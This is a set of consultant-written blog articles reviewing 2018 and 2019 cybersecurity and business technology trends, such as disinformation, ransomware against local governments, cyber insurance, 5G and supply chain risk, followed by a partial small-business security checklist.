The Six Most Impactful Cyber and Business Tech Trends of 2019 and What it Means for 2020.

By Mamady Konneh, MSST, and Jeremy Swenson, MBA, MSST.

Minneapolis, MN — Every year we like to review and commentate on the most impactful security technology and business happenings from the prior year. Those likely to significantly impact the coming year in unique ways. Although incomplete, these are six trends worth addressing in order of importance.

Fig 1. (Cyber Trend Mashup Overlay, + Stock Image, 2019).
76a23722-c088-4067-92b7-1b2e7f357148

1) The Media Disinformation War Continues Embracing Artificial Intelligence:

With the advancement of communications technologies, the growth of large social media networks, and with the “appification” of everything — users have morphed beyond merely consuming information to being distributors and sometimes contributors. This ripens the ease and capability of disinformation.

Disinformation is defined as incorrect information intended to mislead or disrupt, especially propaganda issued by a government organization to a rival power or the media. For example, governments creating digital hate mobs to smear key activists or journalists, suppress dissent, undermine political opponents, spread lies and control public opinion (Shelly Banjo, Bloomberg, 05/23/2019). Today’s disinformation war is largely digital via platforms like Facebook, Twitter, iTunes, WhatsApp, Yelp, and Instagram (Fig. 2). Yet even state-sponsored and private news organizations are increasingly the weapon of choice — creating a false sense of validity. Undeniably, the battlefield is wherever a large number of followers are.

We all know that false news spreads faster than real news most of the time, largely because its sensationalized. Since disinformation draws in viewers, which drives clicks and ad revenues, it’s a money-making machine. If you can control what’s trending in the news and/or social media, it impacts how many people will believe it, which in turn impacts how many people will act on that belief, good or bad. This is exacerbated when combined with human bias or irrational emotion.

Bots and botnets are often behind the spread of disinformation, complicating efforts to trace its source and to stop it. Further complicating this phenomenon is the amount of app (application) to app permissions. For example, the CNN and Twitter app having permission to post to Facebook and then Facebook having permission to post to WordPress and then WordPress posting on Reddit, or any combination like this. Not only does this make it hard to identify the chain of custody and source, but it also weakens privacy and security due to the many authentication permissions.

Fig 2. News, Social Media, and Puppet Master of Disinformation (Right, Chandrajit Banerjee, Left Marc Creighton, 2019).
Purported Russian Disinformation Flow

Disinformation campaigns attempted to influence U.S. elections in 2016 — presidential, and 2018 — congressional (Fig. 2). The effects are not fully known to this day yet there is some undeniable impact, with debates on both sides. This taken in conjunction with outdated electoral policies and poor public-to-private partnerships support the conclusion that disinformation capabilities are on the rise leading up to the U.S. presidential election in 2020. In fact, according to one report, the number of countries engaged in disinformation increased from 48 to 70 or 150% from 2018 to 2019 (Samantha Bradshaw and Philip N. Howard, Oxford Internet Institute, 09/04/19). This is not about politics, this is about truth, appropriate technology, security improvements, and better public-private partnerships.

Fig. 3. Purported Russian Disinformation Flow (Samuel Morales, 11/08/19).

Purported Russian Disinformation Flow

Moving on, large technology companies are increasingly under scrutiny to secure their platforms from disinformation campaigns. One recent example is as follows, “Twitter announced that it had removed more than 88,000 accounts that it said were engaged in “platform manipulation” originating in Saudi Arabia” (Aaron Holmes, Business Insider, 12/20/19). Since platforms like this have so much activity to monitor, many campaigns like this go on unaltered. Yet, let us not forget about the free speech rights of users and the many claims that certain tech companies are overreaching in their screening content to the level of undue bias. Resolving these two extremes is indeed a work in progress.

Another example which used AI (Artificial Intelligence) enabled disinformation is as follows: ‘“On December 20, 2019, Facebook took action against a network of over 900 pages, groups, and accounts on its own platform and on Instagram that were associated with “The Beauty of Life” (TheBL), reportedly an offshoot of the Epoch Media Group (EMG). These assets were removed for engaging in large-scale coordinated inauthentic behavior (CIB)”’ (Ben Nimmo, C. Shawn Eib, L. Tamora, et al; Graphika & the Atlantic Council’s Digital Forensics Research Lab, 12/2019). Many of these profiles were created with AI generated fake profile photos. The group amassed about 55 million followers, so their disinformation efforts largely worked.

Considering these disinformation events this past year, we think small and mid-size companies are likely the next target of disinformation campaigns. Such campaigns may aim to steal their customers, tarnish their reputation, or otherwise combine disinformation with advanced malware or other cyber fraud. They may be a direct target or a pass through medium. Small businesses are not immune from these risks even if never targeted before. While a large company could sustain several disinformation attacks, a small company could be easily run out of business by just one.

Imagine fraudulent Yelp reviews from a dental competitor who hires a non-U.S. based hacking group to have a bot army create 1,000 negative dental reviews on Yelp. Now the victim of this attack has a mess to clean up. Being a dental office, they are not tech experts, so they have to hire a tech consultancy. Yet even when hired, the full damage can never be undone. The stress and cost could drive them to shut down. Then there is the question of who pays for it? This begs the question of cyber insurance, do you have the correct coverage, is there any way your claims can be denied?

Overall, disinformation is a double-edged sword because if one country is using disinformation against another country, then that country is very tempted to use disinformation against them in response. Then when the public sees this state originated disinformation, they and their NGO (non-governmental organization) groups respond whether they believe the disinformation or not —of course with different responses. The same scenario could apply in a company to company context.

Disinformation is indeed a vicious cycle that encourages lies, ignorance, all the while damaging the value of what journalism means. In 2020 we as journalists, thought leaders, consultants and citizens must not be afraid to confront these fallacies and hidden distortions for future generations — a quality based truthful pen is a powerful sword!

2) Ransomware Doubles Attacking More Government Entities:

Ransomware heavily hit hospitals, businesses, and universities in 2019, but local governments were the top target. It attacked at least 103 local U.S. government agencies, mostly at the city and county levels (Emsisoft Malware Lab, 12/12/19). Further validating this conclusion is Barracuda Networks who found more broadly that two-thirds of all known 2019 ransomware attacks in the U.S. targeted U.S.governments (Alfred Ng, C-NET, 12/05/19). Specifically, these ransomware attacks originate mostly from phishing emails. Then the attackers implant malicious code in the targeted entities’ network, after which they encrypt their files making them inaccessible. These are for the most part not federal offices like the FBI, NSA, DOD, or the FAA — these offices have bigger budgets and better defenses.

In August 2019 twenty-three Texas cities were struck by a large coordinated ransomware attack. This overwhelmed them SO they were forced to seek advanced state assistance (Kate Fazzini, CNBC, 08/20/19). Also in 2019, seven Florida cities were struck in a similar attack: River City, Riviera Beach, Lake City, Key Biscayne, Stuart, Naples, and recently Pensacola (Rachael L Thomas, Naples Daily News, 08/20/19 & CISOMAG, 12/27/19). Moreover, the city of Baltimore, Maryland sustained two ransomware attacks in 14 months (Kate Fazzini, CNBC, 08/20/19). Fig. 4. shows the defaced City of New Orleans website which left citizens out of some services and information.

Fig. 4. City of New Orleans Website Down (NOLA.gov, City of New Orleans, 12/23/19).

City Of New Orleans Hack

Foolish as it may sound local governments are more frequently opting to pay the ransomware rather than rebuild their systems. After seeing Atlanta spend $2.6 million in 2018 to restore its systems rather than pay the $52,000 ransom (Lily Hay Newman, Wired, 04/23/18) — many officials have decided that it’s cheaper to pay the hackers. One researcher confirmed this as follows; ‘“These government organizations are not always well-equipped on cybersecurity concerns, which makes them easy targets,” said Kevin Latimore, enterprise malware removal specialist for security software provider Malwarebytes. “Not only do they have the potential to pay, but they are a soft target”’ (Alfred Ng, C-NET, 12/05/19). More examples of this include Lake City, Florida who paid $426,000 to hackers via Bitcoin, and Riviera Beach Florida who paid hackers $600,000 via Bitcoin in 2019. Much of this will be covered by their cyber insurance but it complicates future payouts making denials and premium increases more likely (Scottie Andrew and Saeed Ahmed, CNN, 06/27/19).

For the coming year, this means that local governments need to harden their networks, better train their staff and hire private-sector talent. If they have paid ransom ware once they should expect and prepare for another attack soon, yet this does not rush onboarding of new vendor tools as vendors need to be risk assessed. Moreover, they outsource key IT tasks when they cannot meet the required service or security. Lastly, paying ransomware is not a long-term solution and it increases the likelihood of another attack, plus there is no guarantee they have not copied your data.

3) Insurance Companies Paying Ransoms Are Likely Encouraging More Attacks for Profits:

When organizations have cyber insurance, they are more likely to pay ransom demands. This results in ransomware being more profitable than it would otherwise be and thus incentivizes more well-funded attacks (Emsisoft Malware Lab, 12/12/19). Yet if insurance companies did better due diligence reviewing prospect customer cyber risk processes, tools, SOC reports and the like — there would likely be less grounds for claims denials and fewer simple claims like ransomware, etc. In some cases, the customer is incented to prove their cyber due diligence to justify a favorable risk rating and lower insurance premiums. However, the rigor of this due diligence is inconsistently applied in favor of sizeable companies where more dollars and complex risk exists. Yet can you imagine being a large insurance company asking a government entity for any documentation like this… it might be difficult. Even small county governments often have many unhelpful bureaucrats who are overconfident thus choking the needed risk management process. Private companies have the same issue, but they have less bureaucratic insulation. Overall, better public-private partnerships are needed.

This year we confirmed that cyber liability insurance risk assessment is still a contradictory mess. The carriers are profit-driven while they often confuse customers on what a policy means, especially small and medium-sized businesses that are not tech-focused. The risk assessment standards are immature, not organization specific, and they are outdated with current technology. If ransomware incentivizes cyber insurance, then what about the likely situation where an organization gets hit with ransomware, then the carrier pays it less the deductible, but then the ransomware demands a second payment. Carriers, adjusters, risk assessors, and even companies have not thought this through well enough. Most likely the carrier will deny the second payment demand and often in tandem with costly litigation.

Whatever the size or your organization, you should undergo strict security reviews in the insurance underwriting process. If the carrier does not ask anything or much about your technology or security, you might as well not pay for the coverage because it’s weak at best. Whatever risk diligence completed in underwriting the coverage, you should not publicly disclose that you have such coverage because cyber extortionists could then view you as a target. Cyber insurance should not be considered as an alternative to adequately funded and resourced security programs, rather it’s a failsafe. Our related article from this summer clarifies some of these complexities 10 Things IT Executives Must Know About Cyber Insurance!

Fig. 5. Cyber Security Spending Greatly Outpaces Cyber Insurance Spending, (Gartner, Munich Re, Microsoft, Marsh, 2019)

Cyber Security Spending Greatly Outpaces Cyber Insurance Spending 2019

Lastly, we observed that cyber insurance spending is not growing as fast as cybersecurity spending from 2018 to 2019 (Fig 5). While for 2019 to 2020 there is a $116 billion dollar estimated difference (Fig 5.). This trend is generally good because you cannot insure away what you have not built securely in the first place. In physical security terms, that would be like a bank having wide open doors and windows often yet wanting to get robbery insurance when they are incenting robbery. Of course, this is far more complicated in cyberspace and insurance companies and risk assessors are moderately speculative at best. We anticipate more partnerships with tech-savvy insurance brokers in 2020, more cyber insurance training, and perhaps new FinTech insurance startups can reduce risk and drive efficiencies while the legislators and large companies catch up.

4) Mobile Ecosystem Security Considerations Multiply:

Since the release of the first iPhone in 2007, the appification of everything is the new norm. Since computing power and memory on smartphones nearly doubles about every two years (Gordon Moore’s Law, 1958); the information security risk on these devices gets more complicated and multiplies with each new app installed.

Here are some recent top metrics from one independent blog study (Ian Blair, BuildFire, 2019):

  1. There are 2.8 million apps available for download on the Google Play Store — More apps equals more risk exposure.
  1. The Apple App Store has 2.2 million apps available for download.
  2. Mobile apps are expected to generate $189 billion in revenue by 2020.
  3. 49% of people open an app 11+ times each day.
  4. 21% of Millennials open an app 50+ times per day.
  5. 57% of all digital media usage comes from mobile apps.
  6. The average smartphone owner uses 30 apps each month — Touching many or all of the mobile ecosystem components in Fig. 6. — Thereby increasing complexity.

Fig 6. Mobile Ecosystem Components (Rohit Kumar, 2019).
Mobile Ecosystem 2019

The Apple App Store has a closed API (application programming interface) and thus less apps, unlike the Google Play App Store which has an open API and more apps. Thus, in prior years Apple’s App Store was regularly perceived as more secure than Google’s Play Store. However, in the fall of 2019, a reported 18 malicious apps were able to bypass Apple’s vetting system. Wired described it as follows, “it started small. Wandera’s security software flagged some unusual activity on a client’s iPhone. A lone speedometer app had made unexpected contact with a so-called command and control server, which had previously been identified as issuing orders to ad fraud malware in a separate Android campaign. In other words, the app had gone rogue” (Brian Barrett, Wired, 10/25/19).

Although the new iPhone 11 has no CPU power increase from the prior version, the new Samsung Galaxy S 11 includes a CPU that raises the bar in some ways for both phones. The new CPU is the Qualcomm Snapdragon 865 and will come with the new Galaxy S 11 in 2020. This CPU is 5G enabled while older chips are not. It also supports up to 8K HD video which has an ultra-high resolution that translates into very large files (Jessica Dolcourt, C-Net, 12/19/19). This enables better video chat, HD gaming, and professional level photo capabilities.

Additionally, the Snapdragon 865’s two-finger biometric unlocking feature has been improved for the Galaxy S 11 thereby challenging the new iPhone 11. The CPU’s 3D Sonic Max fingerprint reader is large enough to register two fingers as one commentator detailed: “This means it’s faster to unlock, and more secure when matching up more unique data points in the form of the ridges, valleys, and pores unique to your fingers. On phones, you might get the option to set up one or two-finger unlocking, or perhaps choose to use dual-finger authentication for mobile payments only, or select apps like your banking app” (Jessica Dolcourt, C-Net, 12/19/19).

Faster CPUs in the mobile ecosystem means that there is more room for malvertising, rootkits, viruses and other exploits to hide. Combine that with the increasing number of apps users download, the permissions they give them, etc. The complexity of this increases privacy and security risk. There is a very fine line between a hacked system and consented to app permissions, yet most users have few details on what this means or how many apps they have on their mobile devices.

For 2020, we see education and awareness around the review and removal of non-essential mobile apps as a top priority. Especially for mobile devices used separately or jointly for work purposes. This begs the questions: 1) what is the best BYOD (bring your own device) policy 2) and good containerization to separate company vs. personal use apps? This requires better understanding around geolocation, QR code scanning, in text ads, micropayments, Bluetooth, geofencing, readers, and HTML5. It thus goes without saying that we feel more holes will be exposed with BYOD tools and policy as they gain more adoption 2020.

5)  Cloud Adoption Raises Privacy and Compliance Concerns:

Cloud computing grew in 2019 and is expected to grow in the coming years. Many industries are opting for cloud computing because it is less costly than on-premises and the service quality is generally better. This especially applies to small and medium businesses that often don’t have the technology resources to build their own infrastructures. According to one study, “83% of enterprise workloads will be in the cloud by 2020” (LogicMonitor, 2019). As a result, many industries are increasing their investment in cloud computing and the costs are likely to go down as cloud providers improve — the services are being democratized via niche cloud service tool startups. At present, “50% of enterprises spend on average of $1.2 million dollars on cloud services annually” (LogicMonitor, 2019).

Although cloud computing might seem cheaper than on-premises solutions, it has its downsides when it comes to security and privacy. Moving to the cloud is accepting the risk of having your data in someone else’s warehouse. Of course, the service level agreement and vendor risk assessment compliance documents will address most of this, but it’s not comprehensive. This is because cloud vendors are selective about what they disclose to customers in their annual or quarterly vendor risk review. This is because they are protecting their own privacy and the privacy of their many other clients where shared infrastructure is relevant. If you want complete privacy and control, build your own cloud but accept the higher cost.

Fig. 7. Public Cloud Challenges Influencers Survey (LogicMonitor, 2019).

Public Cloud Challenges Influencers Survey LogMonitor 2019The above survey by a vendor Logic Monitor confirmed that security, governance and compliance, and privacy were top challenges in 2019. We think these challenges will hold steady in 2020, while costs will likely decrease for basic use cases. If organizations continue to struggle with cloud trained employees, it will negatively impact vendor lock-in. This can be bad from a failover perspective. We think organizations should spend more on cloud trained staff. They should also make sure that they are selecting more than two or three cloud providers, all separate from one another. This helps staff get cross-trained on different cloud platforms and add ons, but it also mitigates risk and makes vendors bid more competitively.

6) Supply Chain Cyber Security Threats Increase:

All organizations depend on other entities for goods and services. Everything from manufacturers, distributors, marketers, attorneys, drivers, resellers, software providers, accountants, and more. The flow of this from start to finish is called the supply chain, and vendor management is the biggest part of it. As a result, it becomes challenging for organizations to identify and assess the security of every vendor they do business with. In fact “at least 59% of organizations have suffered from cyberattacks through third-party companies” (Olivia Scott, Supply Chain Brain, 10/09/19). Depending on the vendor and the connection point there may be more or less steps. More steps increases complexity and often decreases transparency, which in turn often increases risk.

Every aspect of supply chain has an internet-connected component from UPS Package scanners, to invoice creation, inventory management, quality control, and more. Vendors who say or suggest they are not internet-connected are usually wrong because they forgot one thing like utility applications, HVAC applications, coffee machine apps, navigation apps, payment processing apps, and their own 3rd parties that have access to customer data via the vendor, etc.

People often need clarification on what is a 4th party vendor. They are the vendors that your 3rd party vendor contracts with to meet your needs. With a 4th party vendor, you will have less insight into their infrastructure and process, if at all. Most likely any risk documentation you get from them with come via your 3rd party vendor. A lot of misinformation and hidden risk is here. Vendors managers need good communication skills and business tact to deal with this.

In the context of cybersecurity, supply chain is posing a growing threat because most of the parts of our computers and smartphones are made in other parts of the world, including the software used to run these machines. For example, iPhone chips are made by Taiwan Semiconductor Manufacturing Company (TSMC) who works with other vendors for even the smallest of components in a highly complex supply chain, acting as a manufacturer and assembler. If there is a security hole in one of the iPhone components, the customer Apple may not be the first to know because TSMC or their 3rd and 4th party vendors may not know about it or may not disclose it. This negatively impacts Apple and iPhone users.

Observing this paradox, security pioneer Bruce Schneier stated, “the computers and smartphones you use are not built in the United States. Their chips aren’t made in the United States. The engineers who design and program them come from over a hundred countries. Thousands of people have the opportunity, acting alone, to slip a backdoor into the final product” (Bruce Schneier, New York Times, 09/25/19). Thus the supply chain path needs to be scrutinized for security compliance regularly, especially in the context of large-scale hardware manufacturing for data-centric products like smartphones, cars, computers, and medical devices — few devices are not data-centric these days.

In sum, supply chain is here to stay because organizations will need to collaborate with one another in order to conduct their business efficiently. According to the Ponemon Institute, 3rd party misuse was the second-biggest security threat in 2019 (Olivia Scott, Supply Chain Brian, 10/09/19). Yet we need a reminder that supply chain is no longer merely transportation and inventory management, even if we are a goods and services company like a small construction company with no website. We need to rethink of supply chain as more digital and more data-centric than we did in prior years. It is a part of core business operations.

Thus, supply chain security should be a top priority for organizations in 2020 with a focus on 3rd party risk ranking and 4th party identification. Lastly, for big entities like government and corporate conglomerates who have many different internal organizations they interact with. They would be well advised to think of their own internal procurement process as “external supply chain” in an effort to better training and internal defenses — they are often their own worst enemy.

About the Authors:
Mamady Konneh and Jeremy Swenson 2020
Mamady Konneh (left) is a senior information security professional, speaker and mentor with 10+ years of relevant experience in security, risk management, and project management in the healthcare, finance, and retail industries. He is a dynamic team player who leads by taking initiatives in developing efficient risk mitigation and situational awareness tactics. He is proficient at assessing the needs of the business and providing the tools to resolve challenges by enhancing the business process. He holds an MSST (Master of Science in Security Technologies) degree from the U of MN where he researched global I.D. card best practices for the country of Guinea.

Jeremy Swenson (right) is a senior IT consultant, writer, and speaker in business analysis, project management, cyber-security, process improvement, leadership, music, and abstract thinking. He has been employed by or consulted at many banks, insurance companies, retailers, healthcare orgs, governments, and so on over 14 years. He has an MBA from St Mary’s Univesity of MN and MSST (Master of Science in Security Technologies) degree from the U of MN.

Five Unique Tech Trends in 2018 and Implications For 2019

By Jeremy Swenson, MBA, MSST Angish Mebratu, MBA.

Every year we like to review and commentate on the most impactful technology and business concepts from the prior year. Those that are likely to significantly impact the coming year. Although incomplete, these are five areas worth addressing.

5. 5G Expansion Will Spur Business Innovation

Fig. 1. 1G to 5G Growth, Stock, 2018.

2018 was the year 5G moved from hype to reality, and it will become more widespread as the communications supply chain adopts it in 2019. 5G is the next iteration of mobile connectivity and it aims to be much faster and more reliable than 4G, 3G, etc. Impressively, data speeds with 5G are 10 to 100 times faster than 4G. The benefits of this includes enabling: smart IoT connected cities, seamless 8K video streaming, improved virtual reality styled gaming, self-driving cars that communicate with each other without disruption thereby enhancing safety and reliability, and improved virtual reality glasses (HoloLens, Google Glass, etc.) providing a new way of looking at the world around us.

As emerging technologies such as artificial intelligence (AI), blockchain, the Internet of Things (IoT), and edge computing — the practice of processing data near the edge of the network where the data is being generated, not a centralized data-processing repository — take hold everywhere, 5G can offer the advancements necessary to truly take advantage of them. These technologies require 5Gs bolstered data transfer speeds, interoperability, and its improved reliability. Homes will get smarter, hospitals will be able to provide more intelligent care, the Internet of Things will go into hyperdrive — the implications of 5G are massive. Yet most importantly, 5G has much less latency, thereby enabling futuristic real-time application experimentation.

“There’s no doubt that much of the recent 5G activity has been focused on investments from service providers and equipment manufacturers,” Nick Lippis, co-founder and co-chairman of the Open Networking User Group (Kym Gilhooly, BizTech, 11/08/18). “However, more IT leaders are starting to make plans for 5G, which includes determining its impact on their data center architecture, procurement strategies and the solutions they’ll roll out”(Kym Gilhooly, BizTech, 11/08/18). 

AT&T is one of the leaders in 5G distribution and as of 12/27/18 they have service up and running in these 12 cities: Atlanta, Charlotte, Dallas, Houston, Indianapolis, Jacksonville, Louisville, Oklahoma City, New Orleans, Raleigh, San Antonio and Waco (CNN Wire, 12/27/18). Verizon has a similar initiative in an earlier phase in some cities. While Google has Google Fiber is some cities, but there is lots of debate about if its better or worse than 5G – time will tell. More data and faster speeds derive more connected devices which need security, data protection, and privacy — failure to protect it aggressively derives to much risk at high costs.

Fig. 2. Likely 5G Use Cases in 2020, Stock, 2018.

4. Browser/Device Fingerprinting Growth Will Spur Better PET (Privacy Enhancing Technologies)

Browser fingerprinting is a method in which websites gather bits of information about your visit including your time zone, set of installed fonts, language preferences, some plug-in information, etc (Bill Budington, Bennett Cyphers, Alan Toner, and Jeremy Gillula, Electronic Freedom Foundation, 12/22/18). These data elements are then combined to form a unique fingerprint that identifies your browser or more. The next step is to identify your specific device, and then you individually.

Fig. 3. Browser Finger Printing Data, Stock, 2018.

Device fingerprinting overcomes some of the inefficiencies of using other means of customer-tracking. Most notably, this includes cookies installed in web browsers, which businesses have long used monitor user behavior when we visit their websites (Bernard Marr, Forbes, 06/23/17). Employers do this at a much more invasive level, but the pay is the tradeoff. Yet when employees use their own mobile device for work-related things, protection of their personal data is best achieved via data containerization tools like AirWatch and Centrify. Even on these devices, the problem is that cookies can be deleted whenever we want. Its relatively easy for us to stop specific sites, services or companies from using them to track us — depending on how technical we are. Device fingerprinting doesn’t have this limitation as it doesn’t rely on storing data locally on our machines, instead, it simply monitors data transmitted and received as devices connect with each other” (Bernard Marr, Forbes, 06/23/17).

This type of data exploitation, even with the user’s consent, allows for more complexity and thus higher malware or SPAM/advertising risk. Antivirus makers are challenged to stay ahead of these exploits. The GDPR (General Data Protection Regulation) unequivocally states that this kind of personal data collection and user tracking is not permitted to override the “fundamental rights and freedoms of the data subject, including privacy” and is, we believe, not permitted by the new European regulation (Bill Budington, Bennett Cyphers, Alan Toner, and Jeremy Gillula, Electronic Freedom Foundation, 12/22/18). The high courts will validate this over time.

Further complicating the matter is the terms of service on data-centric technology platforms such as Facebook, Twitter, LinkedIn, WordPress, Instagram, Amazon, etc. Their business models require considerable data sharing with third and fourth-party business entities, who gather elements of specific user data and then combine them with other browser and device fingerprinting data elements, thus completing the dataset. All the while the data subject and interconnected entities are mostly clueless. This further complicates compliance, erodes privacy, but is great for marketers — many people appreciate that Amazon correctly suggests what they often desire. Yet that is not always a good thing because this starts to precondition a person or a culture to norms at the expense of originality. In the past we saw tobacco companies do this unethically targeting young people, and there are more examples — think for yourself.

This begs the question of who owns these datasets and at what point in their semblance, where are they stored, how are they protected, and to what extent can informed consumers opt out if practicable — observing there is be some incidental data collection that has business protection. This paradox spurs competition and the growth of privacy enhancing technologies (PETs). Existing PETs include communication anonymizers, shared bogus online accounts, obfuscation tools, two or three-factor authentication, VPNs (virtual private networks), I.P. address rotation, enhanced privacy ID (EPID), and digital signature algorithms (encryption) which support anonymity in that each user has unique public verification key and a unique private signature key. Often these PETs are more useful when used with a fake account or server (honeynet). This attempts to divert and frustrate a potential intruder but gives the defender valuable intelligence.

Fig. 4. VPN Data Flow Diagram, Stock, 2018.

Opera, Tor and Firefox are leading secure browsers but there is an opportunity for better security and privacy plugins from the Chrome (Google) browser, while VPN (Virtual Private Network) technologies should be used at the same time for added privacy. These technologies are designed to limit tracking and correlation of users’ interactions with third-party entities. Limited-disclosure (LD) often uses cryptographic-techniques (CT) which allows users to retrieve only data that is vetted by providers, for which the transmitted data to the third party is trusted and verified.

3. Artificial Intelligence Will Grow on The SMB (Small and Medium Business) and Individual Market

In the past artificial intelligence (AI) has been primarily the plaything of big tech companies like Amazon, Baidu, Microsoft, Oracle, Google, and some well-funded cybersecurity startups like Cylance. Yet for many other companies and sects of the economy, these AI systems have been too expensive and too difficult to roll out effectively. Heck, even machine learning and big data analytics systems can be cost and time prohibitive for some sects of the economy, and for sure the individual market in prior years. However, we feel the democratizing of cloud-based AI and machine learning tools will make AI tools more accessible to the SMB and individual market.

Fig. 5. Open Source TensorFlow Math AI, Google, 2018.

At present, Amazon dominates cloud AI with its AWS (Amazon Web Services) subsidiary. Google is challenging that with TensorFlow, an open-source AI library that can be used to build other machine-learning software. TensorFlow was the Machine Learning behind suggested Gmail smart replies. Recently Google announced their Cloud AutoML, a suite of pre-trained systems that could make AI easier to use (Kyle Wiggers, Venture Beat, 07/28/18). Additionally, “Google announced Contact Center AI, a machine learning-powered customer representative built with Google’s Dialogflow package that interacts with callers over the phone. Contact Center AI, when deployed, fields incoming calls and uses sophisticated natural language processing to suggest solutions to common problems. If the virtual agent can’t solve the caller’s issue, it hands him or her off to a human agent — a feature Google labels “agent assist” — and presents the agent with information relevant to the call at hand” (Kyle Wiggers, Venture Beat, 07/28/18). 

The above contact center AI and chatbots can both be applied successfully to personal use cases such as medical triaging, travel assistance, self-harm prevention, translation, training, and improved personal service. Cloud platforms and AI construction tools like the open source TensorFlow will enable SMBs to optimize insurance prices, model designs, diagnosis and treat eye conditions, and build intelligence contact center personas and chatbots, and much more as technology evolves in 2019.

2. Useful Big Data Will Make or Break Organizational Competitiveness

Developed economies increasingly use big data-intensive technologies for everything from healthcare decisioning to geolocation to power consumption, and soon the world will to. From traffic patterns, to music downloads to web service application histories and medical data. It is all stored and analyzed to enable technology and services. Big data use has increased the demand for information management companies such as, Oracle, Software AG, IBM, Microsoft, Salesforce, SAP, HP, and Dell-EMC — who themselves have spent billions on software tools and buying startups to fill their own considerable big data analytics gaps.

Fig. 6. Big Data Venn Diagram, Stock, 2018.

For an organization to be competitive and to ensure their future survival a “must have big data goal” should be established to handle the complexity of the ever-increasing massive volume of both, structured (rows and table) and unstructured (images and blobs) data. In most enterprise organizations, the volume of data is too big, or it moves too fast or it exceeds current processing capacity. Moreover, the explosive growth of the Internet of Things (IoT) devices provides new data, APIs, plugins/tools, and thus complexity and ambiguity.

We know there are open source tools that will likely improve reliability in big data, AI, service, and security contexts in 2019. For example, Apache Hadoop is well-known for its capabilities for huge-scale data processing. Its open source big data framework can run on-prem or in the cloud and has very low hardware requirements (Vladimir Fedak, Towards Data Science, 08/29/18). Apache Cassandra is another big data tool born out of Facebook around 2010. It can process structured data sets distributed across a huge number of nodes across the world. It works well under heavy workloads due to its architecture without single points of failure and boasts unique capabilities no other NoSQL or relational database has. Additionally it features, great liner scalability, simplicity of operations due to a simple query language used, constant replication across nodes, and more (Vladimir Fedak, Towards Data Science, 08/29/18).

For 2019 organizations should consider big data a mainstream quality business practice. They should utilize and research new tools and models to improve their big data use and applications — creating a center of excellence without being married to buzzwords or overly weak certifications that all too often squash disruptive solutioning. Lastly, these centers of excellence need to be dominated not by the traditional IT director overloads. Rather, the real people between the cracks who know more and have more creative ideas than these directors who often build yes clichés around themselves and who are often not the most qualified — great ideas and real leaders defy title.

1. Election Disinformation and Weak U.S. Polling Systems Harms Business and Must Be Fixed

The intersection of U.S. politics and media can be at times nasty, petty, selfish, or worse outright lies and dirty smear campaigns under shadow proxies who skirt campaign finance laws by being either a policy advocacy group – non-political, or worse yet, a foreign-sponsored clandestine intelligence agency of an enemy to the nation whose only rule is to disrupt U.S. elections. Perhaps Russian, North Korea, or even China affiliated groups.

Innovations in big data and social media, browser proxies and fiber optic cable, 5G, in conjunction with the antiquated and insecure U.S. polling system, makes election news and security complicated, fragile and highly important. At present, there are few people and technology companies that can help resolve this dilemma. For a state-sponsored hacker group altering a U.S. election is the ultimate power play.

Respect for all parties is a must and disinformation of any type should not be tolerated. Universities, think tanks, startups, government, and large companies need to put time and money into experimenting as to how we can reduce disinformation and better secure the polling systems. The first step is public awareness and education on checking purported news sources, especially those from digital media. The second step is more frequent enforcement of slander laws and policies. Lastly, we should hold technology companies to high media ethics standards and should write to their leaders when they violate them. 

As for securing the polling systems, multi-factor authentication should be used, and voting should be done digitally via secure encrypted keys. If Amazon can securely track the world’s purchases of millions of products with way more data and complexity, and with service a moon shot better than your local state DMV (driver and motor vehicle) office, than the paper ballot and OCR (Optical Character Recognition) scanners need to go. There are many Android and iOS applications that are more secure, faster, and easier to use than the current U.S. polling system and they are doing more complex things and with more data that is changing at an exponentially faster rate. They were also made for less money. Shame on the U.S. OCR election system.

Business should not be afraid to talk about this, because, like a poisonous malware, it will spread and be used to easily run businesses out of business – often due to greed and/or petty personal differences. Examples of this include hundreds or thousands of fraudulent negative Yelp reviews, driving a competitor’s search rankings down or to a malicious site, redirecting their 1-800 number to a travel scam hotline, spreading false rumors, cyber-squatting, and more. Let 2019 be the year we stand to innovate via disruptive technologies for a more ethical economy.

About the Authors:

Fig. 7. Swenson and Mebratu.

Jeremy Swenson, MBA, MSST & Angish Mebratu, MBA meet in graduate business school where they collaborated on global business projects concerning leadership, team dynamics, and strategic innovation. They also worked together at Optum / UHG. Mr. Swenson is a seasoned (14 years) IT consultant, writer, and speaker in business analysis, project management, cyber-security, process improvement, leadership, music, and abstract thinking. Over 15 years Mr. Mebrahtu has worked with various fortune 500 companies including Accenture and Thomson Reuters, and he is currently principal quality engineer/manager at UnitedHealthcare. He is also an expert in software quality assurance, cybersecurity technologies, and design and architecture of technology frames.

Top 12 Ways Small To Med Businesses Can Reduce Cyber Risk

1) Use the Free DHS Developed CSET (Cybersecurity Evaluation Tool) To Assess Your Security Posture: High, Med, or Low.

Figure 1. (DHS, 2018).
CSET Process.PNG

2) Educate Employees About Cyber Threats and Hold Them Accountable. 

Educate your employees about online threats and how to protect your business’s data, including safe use of social networking sites. Depending on the nature of your business, employees might be introducing competitors to sensitive details about your firm’s internal business. Employees should be informed about how to post online in a way that does not reveal any trade secrets to the public or competing businesses. Use games with training and hold everyone accountable to security policies and procedures.

3) Protect Against Viruses, Spyware, and Other Malicious Code.

Make sure each of your business’s computers are equipped with antivirus software and anti-spyware and updated regularly. Such software is readily available online from a variety of vendors. All software vendors regularly provide patches and updates to their products to correct security problems and improve functionality. Configure all software to install updates automatically. Especially watch freeware which contains malvertising.

4) Secure Your Networks.

Safeguard your Internet connection by using a firewall and encrypting information. If you have a Wi-Fi network, make sure it is secure and hidden. To hide your Wi-Fi network, set up your wireless access point or router so it does not broadcast the network name, known as the Service Set Identifier (SSID). Have a secure strong password such as (xeyg1845%RELIGO) to protect access to the router.

5) Base Your Security Strategy Significantly on the NIST Cybersecurity Framework 1.1: Identity, Detect Defend, Respond, and Recover.

Fig. 2. (NIST, 2018).
NIST

6) Establish Security Practices and Policies to Protect Sensitive Information.

Establish policies on how employees should handle and protect personally identifiable information and other sensitive data. Clearly outline the consequences of violating your business’s cybersecurity policies and who is accountable.

7) Require Employees to Use Strong Passwords and to Change Them Often.

Consider implementing multi-factor authentication that requires additional information beyond a password to gain entry. Check with your vendors that handle sensitive data, especially financial institutions, to see if they offer multi-factor authentication for your account. Smart card plus pass-code for example.

8) Employ Best Practices on Payment Cards. 

